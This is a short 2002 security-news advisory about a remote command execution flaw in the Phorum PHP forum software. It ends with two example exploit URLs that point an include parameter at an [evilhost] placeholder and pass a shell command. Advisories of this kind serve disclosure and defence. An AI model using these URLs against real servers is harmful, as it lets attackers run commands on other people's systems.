Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Phorum Remote Command Execution Vulnerability

Phorum Remote Command Execution Vulnerability

by Nikola Strahija on May 19th, 2002 A vulnerability has been reported in Phorum that will allow remote attackers to specify external PHP scripts and potentially execute commands. The vulnerability exists in 'plugin.php','admin.php' and 'del.php' files found in the distribution of Phorum. It is possible for a malicious attacker to specify the location of a parameter to the vulnerable PHP files by passing an argument via URL to the PHP files.


Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.

Remote: Yes

Exploit: The following examples were submitted:

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls




Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »